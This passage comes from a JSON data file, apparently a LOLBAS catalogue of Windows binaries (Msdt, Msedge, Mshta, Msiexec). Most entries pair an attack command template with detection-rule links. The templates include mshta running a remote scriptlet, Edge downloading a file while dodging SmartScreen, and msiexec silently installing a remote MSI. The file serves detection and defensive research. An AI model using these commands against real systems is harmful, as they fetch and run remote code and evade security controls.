(CVE-2022-30190). Note that this specific technique will not work on a patched system with the June 2022 Windows Security update.","usecase":"Execute code bypass Application allowlisting","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Windows\\System32\\Msdt.exe","C:\\Windows\\SysWOW64\\Msdt.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_lolbin_msdt_answer_file.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msdt_arbitrary_command_execution.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"}],"references":["https://web.archive.org/web/20160322142537/https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/","https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/","https://twitter.com/harr0ey/status/991338229952598016","https://twitter.com/nas_bench/status/1531944240271568896","https://lolbas-project.github.io/lolbas/Binaries/Msdt/"]},{"id":"lolbas:msedge-exe:0","toolId":"lolbas:msedge-exe","toolName":"Msedge.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"msedge.exe {REMOTEURL:.exe.txt}","description":"Edge will launch and download the file. A 'harmless' file extension (e.g. .txt, .zip) should be appended to avoid SmartScreen.","usecase":"Download file from the internet","mitre":["T1105"],"privilege":"user","fullPath":["c:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe","c:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_browsers_msedge_arbitrary_download.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_browsers_chromium_headless_file_download.yml"}],"references":["https://twitter.com/mrd0x/status/1478116126005641220","https://twitter.com/mrd0x/status/1478234484881436672","https://lolbas-project.github.io/lolbas/Binaries/Msedge/"]},{"id":"lolbas:msedge-exe:1","toolId":"lolbas:msedge-exe","toolName":"Msedge.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"msedge.exe --headless --enable-logging --disable-gpu --dump-dom \"{REMOTEURL:.base64.html}\" > {PATH:.b64}","description":"Edge will silently download the file. File extension should be .html and binaries should be encoded.","usecase":"Download file from the internet","mitre":["T1105"],"privilege":"user","fullPath":["c:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe","c:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_browsers_msedge_arbitrary_download.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_browsers_chromium_headless_file_download.yml"}],"references":["https://twitter.com/mrd0x/status/1478116126005641220","https://twitter.com/mrd0x/status/1478234484881436672","https://lolbas-project.github.io/lolbas/Binaries/Msedge/"]},{"id":"lolbas:msedge-exe:2","toolId":"lolbas:msedge-exe","toolName":"Msedge.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"msedge.exe --disable-gpu-sandbox --gpu-launcher=\"{CMD} &&\"","description":"Edge spawns cmd.exe as a child process of msedge.exe and executes the specified command","usecase":"Executes a process under a trusted Microsoft signed binary","mitre":["T1218.015"],"privilege":"user","fullPath":["c:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe","c:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_browsers_msedge_arbitrary_download.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_browsers_chromium_headless_file_download.yml"}],"references":["https://twitter.com/mrd0x/status/1478116126005641220","https://twitter.com/mrd0x/status/1478234484881436672","https://lolbas-project.github.io/lolbas/Binaries/Msedge/"]},{"id":"lolbas:mshta-exe:0","toolId":"lolbas:mshta-exe","toolName":"Mshta.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"mshta.exe {PATH:.hta}","description":"Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript.","usecase":"Execute code","mitre":["T1218.005"],"privilege":"user","fullPath":["C:\\Windows\\System32\\mshta.exe","C:\\Windows\\SysWOW64\\mshta.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mshta_susp_pattern.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mshta_lethalhta_technique.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mshta_javascript.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/image_load/image_load_susp_script_dotnet_clr_dll_load.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/f8f643041a584621e66cf8e6d534ad3db92edc29/rules/windows/defense_evasion_mshta_beacon.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/lateral_movement_dcom_hta.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/08ed88bd88259c03c771c30170d2934ed0a8f878/stories/suspicious_mshta_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_mshta_renamed.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_mshta_spawn.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_mshta_child_process.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_mshta_url_in_command_line.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"mshta.exe executing raw or obfuscated script within the command-line"},{"type":"IOC","value":"General usage of HTA file"},{"type":"IOC","value":"msthta.exe network connection to Internet/WWW resource"},{"type":"IOC","value":"DotNet CLR libraries loaded into mshta.exe"},{"type":"IOC","value":"DotNet CLR Usage Log - mshta.exe.log"}],"references":["https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_4","https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/mshta.sct","https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/","https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/","https://lolbas-project.github.io/lolbas/Binaries/Mshta/"]},{"id":"lolbas:mshta-exe:1","toolId":"lolbas:mshta-exe","toolName":"Mshta.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"mshta.exe vbscript:Close(Execute(\"GetObject(\"\"script:{REMOTEURL:.sct}\"\")\"))","description":"Executes VBScript supplied as a command line argument.","usecase":"Execute code","mitre":["T1218.005"],"privilege":"user","fullPath":["C:\\Windows\\System32\\mshta.exe","C:\\Windows\\SysWOW64\\mshta.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mshta_susp_pattern.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mshta_lethalhta_technique.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mshta_javascript.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/image_load/image_load_susp_script_dotnet_clr_dll_load.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/f8f643041a584621e66cf8e6d534ad3db92edc29/rules/windows/defense_evasion_mshta_beacon.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/lateral_movement_dcom_hta.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/08ed88bd88259c03c771c30170d2934ed0a8f878/stories/suspicious_mshta_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_mshta_renamed.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_mshta_spawn.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_mshta_child_process.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_mshta_url_in_command_line.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"mshta.exe executing raw or obfuscated script within the command-line"},{"type":"IOC","value":"General usage of HTA file"},{"type":"IOC","value":"msthta.exe network connection to Internet/WWW resource"},{"type":"IOC","value":"DotNet CLR libraries loaded into mshta.exe"},{"type":"IOC","value":"DotNet CLR Usage Log - mshta.exe.log"}],"references":["https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_4","https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/mshta.sct","https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/","https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/","https://lolbas-project.github.io/lolbas/Binaries/Mshta/"]},{"id":"lolbas:mshta-exe:2","toolId":"lolbas:mshta-exe","toolName":"Mshta.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"mshta.exe javascript:a=GetObject(\"script:{REMOTEURL:.sct}\").Exec();close();","description":"Executes JavaScript supplied as a command line argument.","usecase":"Execute code","mitre":["T1218.005"],"privilege":"user","fullPath":["C:\\Windows\\System32\\mshta.exe","C:\\Windows\\SysWOW64\\mshta.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mshta_susp_pattern.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mshta_lethalhta_technique.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mshta_javascript.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/image_load/image_load_susp_script_dotnet_clr_dll_load.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/f8f643041a584621e66cf8e6d534ad3db92edc29/rules/windows/defense_evasion_mshta_beacon.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/lateral_movement_dcom_hta.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/08ed88bd88259c03c771c30170d2934ed0a8f878/stories/suspicious_mshta_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_mshta_renamed.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_mshta_spawn.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_mshta_child_process.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_mshta_url_in_command_line.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"mshta.exe executing raw or obfuscated script within the command-line"},{"type":"IOC","value":"General usage of HTA file"},{"type":"IOC","value":"msthta.exe network connection to Internet/WWW resource"},{"type":"IOC","value":"DotNet CLR libraries loaded into mshta.exe"},{"type":"IOC","value":"DotNet CLR Usage Log - mshta.exe.log"}],"references":["https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_4","https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/mshta.sct","https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/","https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/","https://lolbas-project.github.io/lolbas/Binaries/Mshta/"]},{"id":"lolbas:mshta-exe:3","toolId":"lolbas:mshta-exe","toolName":"Mshta.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"mshta.exe \"{PATH_ABSOLUTE}:file.hta\"","description":"Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript.","usecase":"Execute code hidden in alternate data stream","mitre":["T1218.005"],"privilege":"user","fullPath":["C:\\Windows\\System32\\mshta.exe","C:\\Windows\\SysWOW64\\mshta.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mshta_susp_pattern.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mshta_lethalhta_technique.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mshta_javascript.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/image_load/image_load_susp_script_dotnet_clr_dll_load.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/f8f643041a584621e66cf8e6d534ad3db92edc29/rules/windows/defense_evasion_mshta_beacon.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/lateral_movement_dcom_hta.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/08ed88bd88259c03c771c30170d2934ed0a8f878/stories/suspicious_mshta_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_mshta_renamed.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_mshta_spawn.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_mshta_child_process.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_mshta_url_in_command_line.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"mshta.exe executing raw or obfuscated script within the command-line"},{"type":"IOC","value":"General usage of HTA file"},{"type":"IOC","value":"msthta.exe network connection to Internet/WWW resource"},{"type":"IOC","value":"DotNet CLR libraries loaded into mshta.exe"},{"type":"IOC","value":"DotNet CLR Usage Log - mshta.exe.log"}],"references":["https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_4","https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/mshta.sct","https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/","https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/","https://lolbas-project.github.io/lolbas/Binaries/Mshta/"]},{"id":"lolbas:mshta-exe:4","toolId":"lolbas:mshta-exe","toolName":"Mshta.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"mshta.exe {REMOTEURL}","description":"It will download a remote payload and place it in INetCache.","usecase":"Downloads payload from remote server","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\mshta.exe","C:\\Windows\\SysWOW64\\mshta.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mshta_susp_pattern.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mshta_lethalhta_technique.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mshta_javascript.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/image_load/image_load_susp_script_dotnet_clr_dll_load.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/f8f643041a584621e66cf8e6d534ad3db92edc29/rules/windows/defense_evasion_mshta_beacon.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/lateral_movement_dcom_hta.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/08ed88bd88259c03c771c30170d2934ed0a8f878/stories/suspicious_mshta_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_mshta_renamed.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_mshta_spawn.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_mshta_child_process.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_mshta_url_in_command_line.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"mshta.exe executing raw or obfuscated script within the command-line"},{"type":"IOC","value":"General usage of HTA file"},{"type":"IOC","value":"msthta.exe network connection to Internet/WWW resource"},{"type":"IOC","value":"DotNet CLR libraries loaded into mshta.exe"},{"type":"IOC","value":"DotNet CLR Usage Log - mshta.exe.log"}],"references":["https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_4","https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/mshta.sct","https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/","https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/","https://lolbas-project.github.io/lolbas/Binaries/Mshta/"]},{"id":"lolbas:msiexec-exe:0","toolId":"lolbas:msiexec-exe","toolName":"Msiexec.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"msiexec /quiet /i {PATH:.msi}","description":"Installs the target .MSI file silently.","usecase":"Execute custom made msi file with attack code","mitre":["T1218.007"],"privilege":"user","fullPath":["C:\\Windows\\System32\\msiexec.exe","C:\\Windows\\SysWOW64\\msiexec.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msiexec_web_install.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msiexec_masquerading.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/uninstall_app_using_msiexec.yml"},{"type":"IOC","value":"msiexec.exe retrieving files from Internet"}],"references":["https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/","https://twitter.com/PhilipTsukerman/status/992021361106268161","https://badoption.eu/blog/2023/10/03/MSIFortune.html","https://lolbas-project.github.io/lolbas/Binaries/Msiexec/"]},{"id":"lolbas:msiexec-exe:1","toolId":"lolbas:msiexec-exe","toolName":"Msiexec.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"msiexec /q /i {REMOTEURL}","description":"Installs the target remote & renamed .MSI file silently.","usecase":"Execute custom made msi file with attack code from remote server","mitre":["T1218.007"],"privilege":"user","fullPath":["C:\\Windows\\System32\\msiexec.exe","C:\\Windows\\SysWOW64\\msiexec.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msiexec_web_install.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msiexec_masquerading.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/uninstall_app_using_msiexec.yml"},{"type":"IOC","value":"msiexec.exe retrieving files from Internet"}],"references":["https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/","https://twitter.com/PhilipTsukerman/status/992021361106268161","https://badoption.eu/blog/2023/10/03/MSIFortune.html","https://lolbas-project.github.io/lolbas/Binaries/Msiexec/"]},{"id":"lolbas:msiexec-exe:2","toolId":"lolbas:msiexec-exe","toolName":"Msiexec.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"msiexec /y {PATH_ABSOLUTE:.dll}","description":"Calls DllRegisterServer to register the target DLL.","usecase":"Execute dll files","mitre":["T1218.007"],"privilege":"user","fullPath":["C:\\Windows\\System32\\msiexec.exe","C:\\Windows\\SysWOW64\\msiexec.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msiexec_web_install.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msiexec_masquerading.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/uninstall_app_using_msiexec.yml"},{"type":"IOC","value":"msiexec.exe retrieving files from Internet"}],"references":["https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/","https://twitter.com/PhilipTsukerman/status/992021361106268161","https://badoption.eu/blog/2023/10/03/MSIFortune.html","https://lolbas-project.github.io/lolbas/Binaries/Msiexec/"]},{"id":"lolbas:msiexec-exe:3","toolId":"lolbas:msiexec-exe","toolName":"Msiexec.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"msiexec /z {PATH_ABSOLUTE:.dll}","description":"Calls DllUnregisterServer to un-register the target DLL.","usecase":"Execute dll 